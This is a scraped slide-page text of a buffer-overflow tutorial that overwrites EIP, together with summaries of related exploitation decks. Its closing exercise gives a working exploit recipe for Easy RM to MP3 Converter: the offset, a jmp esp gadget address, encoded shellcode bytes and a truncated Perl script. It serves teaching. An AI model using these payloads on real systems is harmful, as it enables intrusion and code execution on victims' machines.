This document provides an overview of system hacking and reverse engineering techniques. It introduces various buffer overflow exploitation methods like overwriting the return address, structured exception handling, egg hunting, and return-oriented programming on Windows, Unix-like, and ARM platforms. Specific exploitation steps are demonstrated, such as overwriting the return address in a stack-based buffer overflow to redirect execution to shellcode. The document also provides an example exploit targeting a Windows application vulnerable to a stack-based buffer overflow through crafted playlist files.
System Hacking Tutorial #1 - Introduction to Vulnerability and Type of Vulner..., by sanghwan ahn
The document discusses system hacking and reverse engineering techniques. It provides an introduction to vulnerabilities and types of vulnerabilities. The document outlines two tracks - the first introduces bugs, crashes, vulnerabilities, exploitation and defense mechanisms. The second track discusses different types of vulnerabilities like buffer overflows, format string bugs, and use-after-free vulnerabilities. It explains the principles and exploitation of stack and heap overflows.
The document discusses system hacking and reverse engineering techniques. It introduces egg hunting, which searches a process's memory to locate and execute injected shellcode when only a small buffer is available for exploitation. Egg hunting code consists of an egg hunter, marker, and shellcode. The egg hunter searches for the marker and jumps to it, then the shellcode executes. Various exploitation techniques are covered for Windows, Unix-like systems and ARM.
Exploit Research and Development Megaprimer: Win32 Egghunter, by Ajin Abraham
Exploit Research and Development Megaprimer
http://opensecurity.in/exploit-research-and-development-megaprimer/
http://www.youtube.com/playlist?list=PLX3EwmWe0cS_5oy86fnqFRfHpxJHjtuyf
Class on basic vulnerabilities given at UFPR in 2018.
Introduction to Security class about classical vulnerabilities: TOCTOU, buffer overflow. Attack examples: dirtycow, return2libc, ROP.
This document discusses Return Oriented Programming (ROP), which is a technique for exploiting software vulnerabilities to execute malicious code without injecting new code. It can be done by manipulating return addresses on the program stack to divert execution flow to existing code snippets ("gadgets") that perform the desired task when executed in sequence. The document covers the anatomy of the x86 stack, common ROP attack approaches like stack smashing and return-to-libc, how gadgets work by chaining neutral instructions, and various defenses such as stack canaries, non-executable memory, address space layout randomization, and position-independent executables.
1. The document discusses device drivers in Linux, including file types, driver registration, hotplug, MMC size and partitions, and request queues and elevators.
2. It explains the process of an application opening a device file, how drivers are registered with the kernel, and how devices are handled when hotplugged.
3. Details are provided on how MMC sizes and partitions are represented, and how request queues and elevators are used to process I/O requests to block devices in an efficient manner.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Zero bugs found? Hold my beer AFL! how to improve coverage-guided fuzzing and..., by Maksim Shudrak
Fuzzing remains the most effective technique for bug hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing were published, and dozens of them focused on adapting or improving American Fuzzy Lop in some way. Attractive for its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful, since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in the Google OSS-Fuzz program, which utilizes AFL to generate half a trillion test cases per day.
In practice, this means that we cannot blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0-days. This talk aims to discuss these weaknesses using real examples, explain how we can do fuzzing better, and release a new open-source fuzzer called Manul.
Manul is a highly scalable coverage-guided parallel fuzzer with the ability to search for bugs in open-source and black-box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues that exist in AFL. The authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.
This talk will be of interest to experienced hackers who are willing to improve their bug hunting capabilities, as well as to new researchers who are making their first steps on the thorny trail of bug hunting.
The document discusses various return-oriented programming (ROP) countermeasures, including position-independent executables (PIE), which randomize the base address of all segments, making gadget addresses hard to predict and forcing an attacker to rely on brute forcing. PIE imposes around a 25% performance overhead but is not widely used. Full RELRO prevents PLT/GOT overwrites but does not prevent GOT dereferencing. Stack pivot and return detection are difficult to implement outside of research. From an exploitation standpoint, PIE is the best available option.
This document discusses RISC-V boot processes using the Berkeley Boot Loader (BBL) and RISC-V Proxy Kernel (PK). It explains how upon reset, code in Machine mode initializes the system and switches to Supervisor mode. The boot loader then loads an application ELF into memory. For BBL, it loads a Linux kernel, and for PK it loads a user application. Control is then transferred to the loaded program in User mode. Trap handling mechanisms involving different privilege modes are also covered.
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu..., by Maksim Shudrak
The document discusses using coverage-guided fuzzing to find bugs in modern malware. It begins with an introduction and motivation for using fuzzing techniques on malware. It then provides an overview of coverage-guided fuzzing and how it works. Several case studies are presented where coverage-guided fuzzing was used to find vulnerabilities in popular malware samples like Mirai.
This document provides an introduction to the C programming language in Chinese. It discusses downloading and installing Cygwin on Windows to get a development environment for C. It then covers basic C syntax like printf(), variables, conditions, loops, functions, pointers, arrays, and strings. Examples are provided like a program to evaluate poker card values using switches and if/else statements. The document emphasizes learning C through practical examples and exercises.
This document summarizes Intel Nervana Graph, a graph compiler developed by Nervana Systems and now maintained by Intel. It discusses how Nervana Graph can import models from frameworks like Caffe, TensorFlow, MXNet and convert them to an intermediate graph representation. It then describes how different transformers can convert the graph to executable code for CPUs or GPUs. The document provides code examples for using Nervana Graph with Caffe and TensorFlow models and discusses the implementation of the graph transformations and compiler passes.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
Leak kernel pointer by exploiting uninitialized uses in Linux kernel, by JinbumPark
- Leak kernel pointer by exploiting uninitialized uses in Linux kernel.
- Demonstrated on 4 real-world CVEs.
- The tool used for this is available at github.com/jinb-park/leak-kptr
- Bypassing KASLR
- Kernel pointer spraying using eBPF
- Kernel pointer fuzzing using fuzzer
The document discusses different types of shellcodes and their uses. It provides examples of x86 and x86_64 shellcode code to execute a Linux system call. It also lists resources for further information on shellcode design and exploitation techniques.
Chromium Sandbox on Linux (NDC Security 2019), by Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The Anatomy of an Exploit (NDC TechTown 2019), by Patricia Aas
This document provides an overview of an exploit development process. It begins by discussing how exploits program the "weird machine" of vulnerable programs through memory manipulation. It then walks through developing a stack buffer overflow exploit against a vulnerable C program. Various compiler protections like stack canaries and ASLR are bypassed. The document generates a pattern to find the offset and writes an exploit program to automate writing an exploit string to trigger the vulnerability and redirect execution.
This document discusses bypassing address space layout randomization (ASLR) protections to execute shellcode on the stack. It begins with an overview of stack-based buffer overflows and modern protections like non-executable stacks. It then describes using return-oriented programming (ROP) techniques like ret2libc to hijack control flow and call library functions like system() to spawn a shell. Specifically, it outlines overwriting a return address to call mprotect() to make the stack executable, then jumping to shellcode on the stack. The document provides example exploit code and steps to find needed addresses in memory.
Efficient System Monitoring in Cloud Native Environments, by Gergely Szabó
This document discusses efficient system monitoring in cloud native environments using eBPF. It provides an overview of eBPF and how it can be used for monitoring applications like Prometheus. Specific topics covered include BPF, Linux kernel tracing using kprobes and tracepoints, eBPF maps and programs, and an example Prometheus exporter that leverages eBPF to export metrics.
This talk will shed some light into the intermediate language that is used inside the Hex-Rays Decompiler. The microcode is simple yet powerful to represent real world programs. We publish it and give programmatic access to it from C++.
BPF (Berkeley Packet Filter) allows for safe dynamic program injection into the Linux kernel. It provides an in-kernel virtual machine and instruction set for running custom programs. The BPF infrastructure includes a verifier that checks programs for safety, helper functions to access kernel APIs, and maps for inter-process communication. BPF has become a core kernel subsystem and is used for applications like XDP, tracing, networking, and more.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
Advanced CFG bypass on Adobe Flash Player 18 (DEFCON Russia 23), by DefconRussia
This document describes an advanced technique to bypass Control Flow Guard (CFG) protections on Adobe Flash Player 18 and Windows 8.1. It details how the researchers were able to generate indirect call instructions in just-in-time (JIT) compiled Flash code to redirect execution to controlled addresses, bypassing CFG. This was done by manipulating parameters passed between functions to influence the JIT compiler's code generation and produce the desired indirect call opcodes. The technique allowed full control-flow hijacking on the protected systems.
[ZigBee Embedded Systems] ZigBee Application Implementation - Using TI Z-Stack Firmware, by Simen Li
The document outlines an application called BasicApp that is used to understand the basic operations of the OSAL (Operating System Abstraction Layer) embedded in the ZigBee firmware. It describes initializing tasks using OSAL, processing events, and handling key presses to control an LED using the HAL (Hardware Abstraction Layer) APIs. The code files for the BasicApp include OSAL_BasicApp.c for task initialization, BasicApp.h for constants and function declarations, and BasicApp.c which implements the task event processing and key handling functions.
The document provides an introduction to exploit development. It discusses preparing a virtual lab with tools like Immunity Debugger, Mona.py, pvefindaddr.py and Metasploit. It covers basic buffer overflow exploitation techniques like overwriting EIP and using RETURN oriented programming. The document demonstrates a basic stack-based buffer overflow exploit against the FreeFloat FTP server as a tutorial, covering steps like generating a cyclic pattern, finding the offset and using mona to find a JMP ESP instruction to redirect execution. It also discusses using msfpayload to generate Windows bind shellcode and msfencode to escape bad characters before testing the proof of concept exploit.
The document provides information on advanced assembly language procedures. It discusses the PROC, ADDR, INVOKE and PROTO directives which are used to declare and call procedures. The PROC directive declares a procedure with optional parameters, while INVOKE simplifies procedure calls by passing parameters in a single statement. PROTO creates a procedure prototype. ADDR returns the address of a variable. Stack frames and how parameters and local variables are accessed on the stack are explained. Recursive procedures and how they use stack frames are covered, with examples to calculate a sum and factorial recursively. Finally, the document discusses creating multimodule programs by dividing code across multiple source files that are assembled and linked together.
Slides from JEEConf 2018 talk "Virtual Machine for Regular Expressions". It describes how and why to implement a custom regular expression engine for matching arbitrary sequences.
Presentation on native interfaces for the R programming language given as part of a course in advanced R programming at FHCRC:
https://secure.bioconductor.org/SeattleMay10/
Reversing & Malware Analysis Training Part 4 - Assembly Programming Basics, by securityxploded
This presentation is part of our Reverse Engineering & Malware Analysis Training program.
For more details, refer to our Security Training page:
http://securityxploded.com/security-training.php
The document provides an overview of the C programming language. It states that C was developed in 1972 by Dennis Ritchie at Bell Labs and was used to develop the UNIX operating system. The document then covers various features of C like it being a mid-level programming language, having structured programming, pointers, loops, functions, arrays, and more. It provides examples to explain concepts like input/output functions, data types, operators, control structures, and pointers.
The document provides information about a reversing and malware analysis training program. It begins with a disclaimer stating that the views expressed are solely of the trainer and not the company. It then acknowledges those who supported the training program. It states that the presentation is part of a reversing and malware analysis training program currently only offered locally for free. It introduces the two trainers and provides their backgrounds and contact information. It outlines topics that will be covered including x86 assembly, instructions, stack operations, and calling conventions. It notes that a demonstration will be included.
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
Charlie Miller and Vincenzo Iozzo presented techniques for post-exploitation on the iPhone 2 including:
1. Running arbitrary shellcode by overwriting memory protections and calling vm_protect to mark pages as read/write/executable.
2. Loading an unsigned dynamic library called Meterpreter by mapping it over an existing signed library, patching dyld to ignore code signing, and forcing unloaded of linked libraries.
3. Adding new functionality to Meterpreter, such as a module to vibrate and play a sound on the iPhone, demonstrating how payloads can be extended once loaded into memory.
Pragmatic Optimization in Modern Programming - Demystifying the CompilerMarina Kolpakova
This document discusses compiler optimizations. It begins with an outline of topics including compilation trajectory, intermediate languages, optimization levels, and optimization techniques. It then provides more details on each phase of compilation, how compilers use intermediate representations to perform optimizations, and specific optimizations like common subexpression elimination, constant propagation, and instruction scheduling.
QEMU is an open source system emulator that uses just-in-time (JIT) compilation to achieve high performance system emulation. It works by translating target CPU instructions to simple host CPU micro-operations at runtime. These micro-operations are cached and chained together into basic blocks to reduce overhead. This approach avoids the performance issues of traditional emulators by removing interpretation overhead and leveraging CPU parallelism through pipelining of basic blocks.
ROPInjector is a tool that uses return-oriented programming (ROP) to polymorphically inject malware payloads into benign portable executable (PE) files to evade antivirus detection. It works by analyzing the malware shellcode, finding ROP gadgets in the PE, transforming the shellcode into an equivalent ROP chain, injecting any missing gadgets, assembling the ROP chain building code, and patching the modified PE. Evaluation on VirusTotal showed the tool was able to evade detection from antivirus engines an average of 99.31% of the time when injecting two malware payloads into various PE files.
Sergi Álvarez & Roi Martín - Radare2 Preview [RootedCON 2010]RootedCON
Hace aproximadamente 1 año empezó radare2, un desarrollo paralelo a radare, orientado a ofrecer una API genérica y simple para C, Vala, Genie, python, perl y ruby con el fin de mantener el mínimo de código y presentar un acceso genérico a backends de debugging, formato de fichero, arquitectura, etc.
El framework facilita el uso de plugins o scripting para usar diversos backends de ensamblar/desensamblar, analizar cabeceras, emular, depurar, analizar código, buscar patrones, secuencias binarias entre otras.
Diseñado para ser portable entre múltiples arquitecturas y sistemas operativos, entre ellos, Linux, BSD, Solaris, Windows, x86-32/64, ARM, PowerPC y MIPS.
En la charla se presentará el conjunto de librerías y ejemplos prácticos de uso de esta herramienta.
This document provides an introduction to software exploitation on Linux 32-bit systems. It covers common exploitation techniques like buffer overflows, format strings, and ret2libc attacks. It discusses the Linux memory layout and stack structure. It explains buffer overflows on the stack and heap, and how to leverage them to alter control flow and execute arbitrary code. It also covers the format string vulnerability and how to leak information or write to arbitrary memory locations. Tools mentioned include GDB, exploit-exercises, and Python. Overall it serves as a crash course on the basic techniques and concepts for Linux exploitation.
This document discusses buffer overflow attacks. It begins with an introduction that defines a buffer overflow and examples like the Morris worm. It then explains how buffer overflows work by corrupting the stack and overwriting return addresses. Methods for implementing buffer overflows using Metasploit and injecting shellcode are provided. Countermeasures like stack canaries and bounds checking are described. The document concludes that while defenses have improved, legacy systems remain vulnerable and buffer overflows remain a problem.
The document discusses various methods of writing and assembling a simple "Hello World" program in x86 Assembly using NASM, including:
1) Using Linux system calls to write to stdout and exit
2) Using Win32 system calls and avoiding interrupts
3) Using C library functions like printf and linking with gcc for cross-platform compatibility
This document discusses return-oriented programming (ROP) attacks and variants. It begins with an introduction to ROP attacks, explaining that they circumvent data execution prevention by chaining small snippets of executable code (called gadgets) that end in return instructions. It then covers different ROP attack techniques like using arithmetic, comparison, and loop gadgets to achieve Turing completeness. The document discusses challenges like handling null bytes and describes variants like jump-oriented programming (JOP) that uses indirect jumps. It also covers creating alphanumeric ROP shellcode by selecting printable addresses. In the end, it provides tips for effectively searching gadgets.
A short and fast journey through some of the profiling options available in the Ruby 2.x world, including a look at flamegraphs and new ways of tracking memory usage in the MRI.
Return-to-libc attacks allow executing existing library code by overwriting the return address on the stack to point to library functions like system(). This bypasses non-executable stack protections. The attack involves: 1) Finding addresses of system() and the "/bin/sh" string, 2) Calculating where to put the "/bin/sh" address as system()'s argument, 3) Crafting an exploit to overwrite the return address and launch the attack. This technique can be generalized to return-oriented programming which chains multiple short instruction sequences from libraries.
This talk is all about the Berkeley Packet Filters (BPF) and their uses in Linux.
Agenda:
* What is a BPF and why do we need it?
* Writing custom BPFs
* Notes on BPF implementation in the kernel
* Usage examples: SOCKET_FILTER & seccomp
Speaker:
Kfir Gollan, senior embedded software developer, Linux kernel hacker and software team leader.
Similar to System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP (20)
Malibou Pitch Deck For Its €3M Seed Roundsjcobrien
French start-up Malibou raised a €3 million Seed Round to develop its payroll and human resources
management platform for VSEs and SMEs. The financing round was led by investors Breega, Y Combinator, and FCVC.
Everything You Need to Know About X-Sign: The eSign Functionality of XfilesPr...XfilesPro
Wondering how X-Sign gained popularity in a quick time span? This eSign functionality of XfilesPro DocuPrime has many advancements to offer for Salesforce users. Explore them now!
Need for Speed: Removing speed bumps from your Symfony projects ⚡️Łukasz Chruściel
No one wants their application to drag like a car stuck in the slow lane! Yet it’s all too common to encounter bumpy, pothole-filled solutions that slow the speed of any application. Symfony apps are not an exception.
In this talk, I will take you for a spin around the performance racetrack. We’ll explore common pitfalls - those hidden potholes on your application that can cause unexpected slowdowns. Learn how to spot these performance bumps early, and more importantly, how to navigate around them to keep your application running at top speed.
We will focus in particular on tuning your engine at the application level, making the right adjustments to ensure that your system responds like a well-oiled, high-performance race car.
UI5con 2024 - Bring Your Own Design SystemPeter Muessig
How do you combine the OpenUI5/SAPUI5 programming model with a design system that makes its controls available as Web Components? Since OpenUI5/SAPUI5 1.120, the framework supports the integration of any Web Components. This makes it possible, for example, to natively embed own Web Components of your design system which are created with Stencil. The integration embeds the Web Components in a way that they can be used naturally in XMLViews, like with standard UI5 controls, and can be bound with data binding. Learn how you can also make use of the Web Components base class in OpenUI5/SAPUI5 to also integrate your Web Components and get inspired by the solution to generate a custom UI5 library providing the Web Components control wrappers for the native ones.
Top Benefits of Using Salesforce Healthcare CRM for Patient Management.pdfVALiNTRY360
Salesforce Healthcare CRM, implemented by VALiNTRY360, revolutionizes patient management by enhancing patient engagement, streamlining administrative processes, and improving care coordination. Its advanced analytics, robust security, and seamless integration with telehealth services ensure that healthcare providers can deliver personalized, efficient, and secure patient care. By automating routine tasks and providing actionable insights, Salesforce Healthcare CRM enables healthcare providers to focus on delivering high-quality care, leading to better patient outcomes and higher satisfaction. VALiNTRY360's expertise ensures a tailored solution that meets the unique needs of any healthcare practice, from small clinics to large hospital systems.
For more info visit us https://valintry360.com/solutions/health-life-sciences
WWDC 2024 Keynote Review: For CocoaCoders AustinPatrick Weigel
Overview of WWDC 2024 Keynote Address.
Covers: Apple Intelligence, iOS18, macOS Sequoia, iPadOS, watchOS, visionOS, and Apple TV+.
Understandable dialogue on Apple TV+
On-device app controlling AI.
Access to ChatGPT with a guest appearance by Chief Data Thief Sam Altman!
App Locking! iPhone Mirroring! And a Calculator!!
Most important New features of Oracle 23c for DBAs and Developers. You can get more idea from my youtube channel video from https://youtu.be/XvL5WtaC20A
When it is all about ERP solutions, companies typically meet their needs with common ERP solutions like SAP, Oracle, and Microsoft Dynamics. These big players have demonstrated that ERP systems can be either simple or highly comprehensive. This remains true today, but there are new factors to consider, including a promising new contender in the market that’s Odoo. This blog compares Odoo ERP with traditional ERP systems and explains why many companies now see Odoo ERP as the best choice.
What are ERP Systems?
An ERP, or Enterprise Resource Planning, system provides your company with valuable information to help you make better decisions and boost your ROI. You should choose an ERP system based on your company’s specific needs. For instance, if you run a manufacturing or retail business, you will need an ERP system that efficiently manages inventory. A consulting firm, on the other hand, would benefit from an ERP system that enhances daily operations. Similarly, eCommerce stores would select an ERP system tailored to their needs.
Because different businesses have different requirements, ERP system functionalities can vary. Among the various ERP systems available, Odoo ERP is considered one of the best in the ERp market with more than 12 million global users today.
Odoo is an open-source ERP system initially designed for small to medium-sized businesses but now suitable for a wide range of companies. Odoo offers a scalable and configurable point-of-sale management solution and allows you to create customised modules for specific industries. Odoo is gaining more popularity because it is built in a way that allows easy customisation, has a user-friendly interface, and is affordable. Here, you will cover the main differences and get to know why Odoo is gaining attention despite the many other ERP systems available in the market.
E-Invoicing Implementation: A Step-by-Step Guide for Saudi Arabian CompaniesQuickdice ERP
Explore the seamless transition to e-invoicing with this comprehensive guide tailored for Saudi Arabian businesses. Navigate the process effortlessly with step-by-step instructions designed to streamline implementation and enhance efficiency.
Transform Your Communication with Cloud-Based IVR SolutionsTheSMSPoint
Discover the power of Cloud-Based IVR Solutions to streamline communication processes. Embrace scalability and cost-efficiency while enhancing customer experiences with features like automated call routing and voice recognition. Accessible from anywhere, these solutions integrate seamlessly with existing systems, providing real-time analytics for continuous improvement. Revolutionize your communication strategy today with Cloud-Based IVR Solutions. Learn more at: https://thesmspoint.com/channel/cloud-telephony
What to do when you have a perfect model for your software but you are constrained by an imperfect business model?
This talk explores the challenges of bringing modelling rigour to the business and strategy levels, and talking to your non-technical counterparts in the process.
All you need to know about Spring Boot and GraalVM
System Hacking Tutorial #2 - Buffer Overflow - Overwrite EIP
1. System Hacking & Reverse Engineering
documented by h2spice
h2spice@gmail.com
[ Buffer Overflow - Overwrite EIP ]
2. Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on vulnerabilities (exploitation, hunting, analysis)
3. System Hacking / Reversing
Buffer Overflow
Vulnerability Principles
Stack Overflow
Heap Overflow
Format String Bug
Heap Overflow
Use After Free
Overwriting RET
Overwriting SEH
Exploitation (Win32/*NIX/ARM)
Egg Hunting
RTL
ROP
Heap Spraying
Curriculum Overview
Vulnerability / Malware Analysis
Malware Analysis
Software on X86
Bug Hunting
X86 ARM
Mobile
Vulnerability Analysis
Source Code Analysis
Fuzzing
CVE-XXXX-XXXX
Exploit-DB
Inj3ct0r - 1337day
Reverse Engineering
iOS
Android
Overwriting .dtors
Overwriting GOT
4. Contents
Curriculum Overview
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
6. Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP (Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
8. What is Exploitation?
Exploitation refers to a procedure, sequence of commands, script, program, or specific piece of data crafted to take advantage of a design flaw (a bug, a security vulnerability, and so on) in computer software, hardware, or computer-related electronic equipment so that the target performs the attacker's intended actions; it also refers to the act of attacking with such means.
Exploitation begins from the point at which the attacker is able to control the target's control flow.
An exploit usually consists of code that uses a specific bug to trigger the vulnerability, code that bypasses specific security mechanisms, and code that performs the malicious action.
9. Overwrite RET (Return Address)
Using a stack buffer overflow vulnerability, data (including the attack code) that exceeds the size of a buffer allocated in the stack region is written, so that the saved return address is replaced with the address of the attack code and arbitrary code is executed.
10. How do you fly to shellcode ?
Ways to get to the shellcode
jmp (or call) [register]
: If a register holds an address that points to the shellcode, the attacker can place the address of a jmp (or call) [register] instruction in the Return Address to reach the shellcode.
pop return
: Put an address pointing to the shellcode on the stack, then inject into EIP the address of an instruction sequence such as pop/ret or pop/pop/ret (the number of pops depends on where that address sits on the stack) to reach the shellcode.
push return
: Similar to 'jmp (or call) [register]'. If the attacker cannot find a 'jmp (or call) [register]' opcode anywhere, the address can be pushed onto the stack and then returned to with ret to reach the shellcode.
jmp [register + offset]
: If there is a register pointing to the buffer that contains the shellcode but not to the start of the shellcode itself, the attacker can add the required number of bytes to the register and reach the shellcode through a jmp [register + offset] opcode.
SEH (Error Handler)
: Every program has a default exception handler provided by the OS. So even if the program itself does not use exception handling, the attacker can overwrite the SEH handler with an address of their choosing to reach the shellcode.
11. Overwrite RET
Stack layout (high address at top):
  arg2
  arg1
  &ret (saved eip)
  saved ebp
  char buf[8]
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
12. Overwrite RET
Stack layout (high address at top); strcpy has copied a short string into buf:
  arg2
  arg1
  &ret (saved eip)
  saved ebp
  char buf[8]   <- n w o       (buf[4..7]; each row is drawn with its highest address on the left)
                   l l e H     (buf[0..3])
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from buf[0] (low address) up toward &ret (high address)
13. Overwrite RET
Stack layout (high address at top); strcpy has copied a long run of 'A's into buf:
  arg2
  arg1
  A A A A           (the 'A's continue past &ret into the caller's frame)
  &ret (saved eip)  <- A A A A
  saved ebp         <- A A A A
  char buf[8]       <- A A A A
                       A A A A
                       A A A A
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from buf[0] (low address) up through saved ebp and &ret (high address)
14. Overwrite RET
Stack layout (high address at top); the word that lands on &ret is now the target address:
  arg2
  arg1
  A A A A
  &ret (saved eip)  <- Target Address (to Shell Code)
  saved ebp         <- A A A A
  char buf[8]       <- A A A A
                       A A A A
                       A A A A
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from buf[0] (low address) up through saved ebp and &ret (high address)
15. Overwrite RET
Stack layout (high address at top); final payload:
  arg2
  arg1
  &ret (saved eip)  <- &buf (the buffer that holds the shell code)
  saved ebp         <- Padding
  char buf[8]       <- C o d e
                       S h e l l     ("Shell Code" written from buf[0] upward)
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from buf[0] (low address) up through saved ebp and &ret (high address)
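The frame on slides 11 to 15 comes from one unbounded strcpy() into an 8-byte stack buffer, with saved ebp and the saved return address sitting directly above it. The C below is an added example, not code from the slides: it keeps that vulnerable shape next to a bounded replacement, plus a helper that reports how many bytes a given input would push past the buffer. The buffer size follows the slides' char buf[8]; the inputs are constructed, and nothing here models the frame's exact offsets, which depend on the compiler.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides). The frame on slides 11-15 comes from
 * an unbounded strcpy() into an 8-byte stack buffer: everything above buf
 * (saved ebp, then the saved return address) is reachable by a long input. */

#define BUF_SIZE 8   /* the slides' char buf[8] */

/* The vulnerable shape from the slides. Never call it with untrusted input:
 * any string of 8 or more characters writes past buf. Kept only for contrast. */
void start_vulnerable(const char *arg)
{
    char buf[BUF_SIZE];
    strcpy(buf, arg);          /* no bound: this is the bug */
    printf("%s\n", buf);
}

/* How many bytes an unbounded strcpy() of src would write past a
 * buf_size-byte buffer (0 means it fits). strcpy() also copies the NUL. */
size_t overflow_bytes(const char *src, size_t buf_size)
{
    size_t needed = strlen(src) + 1;
    return needed > buf_size ? needed - buf_size : 0;
}

/* Hardened replacement: the bound comes from the destination, the result
 * is always NUL-terminated, and the caller learns whether the input fit.
 * Rejecting (rather than silently truncating) keeps later code from acting
 * on a half-copied path or filename. */
bool bounded_copy(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return false;
    for (size_t i = 0; i < dst_size; i++) {   /* never read past dst_size bytes of src */
        if (src[i] == '\0') {
            memcpy(dst, src, i + 1);           /* fits, including the NUL */
            return true;
        }
    }
    dst[0] = '\0';                             /* too long: reject, do not overflow */
    return false;
}

/* Same frame as the slides, but with the bounded copy. Returns true only
 * if the input fit and was copied intact. */
bool start_hardened(const char *arg)
{
    char buf[BUF_SIZE];
    if (!bounded_copy(buf, sizeof buf, arg))
        return false;
    return strcmp(buf, arg) == 0;
}

int main(void)
{
    const char *inputs[] = { "Hello", "AAAAAAA", "AAAAAAAAAAAAAAAA" };   /* constructed */
    for (size_t i = 0; i < 3; i++)
        printf("%-20s overflow by %zu byte(s), hardened copy %s\n", inputs[i],
               overflow_bytes(inputs[i], BUF_SIZE),
               start_hardened(inputs[i]) ? "accepted" : "rejected");
    return 0;
}
```

The point of bounded_copy() returning a result is that the length check must be visible at the call site: a fixed-size stack buffer fed from a file or argv with no such check is exactly what the diagrams on these slides depict.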
16. Exercise Time :D
Target Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is
(http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
17. Exercise Time :D
Tip
Generate a pattern using the mona plugin
(!mona pattern_create 30000)
nop sled (0x90 * N)
Shell code (windows/exec calc.exe)
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
18. Exercise Time :D
Exploit Info
.m3u Playlist File Format
length of junk data is 26037
gadget is 0x7608fcfe (jmp esp from MSRMCcodec02.dll)
19. Exercise Time :D
Exploit Code (exploit.pl)
#!/usr/bin/perl
use strict;
use warnings;
my $file = "exploit.m3u";
my $junk = "A" x 26037;                 # padding up to the saved return address
my $eip  = pack('V', 0x7608fcfe);       # jmp esp from MSRMCcodec02.dll
my $shellcode = "\x90" x 25;            # nop sled
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
